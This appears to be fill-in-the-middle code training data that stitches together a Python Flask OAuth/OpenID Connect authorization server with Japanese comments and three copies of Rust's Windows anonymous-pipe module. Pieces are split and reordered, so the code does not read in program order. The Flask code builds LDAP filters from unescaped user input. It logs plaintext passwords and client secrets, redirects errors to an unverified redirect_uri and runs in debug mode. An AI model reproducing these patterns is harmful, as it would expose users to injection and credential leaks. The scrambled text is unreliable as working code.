def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
| st' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報をエル
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
| # クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization reque | identifier_body |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect do it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, AnonPipe { inner: writer.into_handle() }))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle { &self.inner }
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// opreations, this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an even will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// Takes a parameter `wait` which indicates if this pipe is currently being
/// read whether the function should block waiting for the read to complete.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn | (&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and schedule read, and then calls `read_to_end`
/// if necessary to read all the remaining information.
fn finish(&mut self) -> io::Result<()> {
while self.result()? && self.schedule_read()? {
// ...
}
Ok(())
}
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
}
| result | identifier_name |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect do it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, AnonPipe { inner: writer.into_handle() }))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle { &self.inner }
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// opreations, this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an even will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// Takes a parameter `wait` which indicates if this pipe is currently being
/// read whether the function should block waiting for the read to complete.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn result(&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and schedule read, and then calls `read_to_end`
/// if necessary to read all the remaining information.
fn finish(&mut self) -> io::Result<()> { | }
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
} | while self.result()? && self.schedule_read()? {
// ...
}
Ok(()) | random_line_split |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect do it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
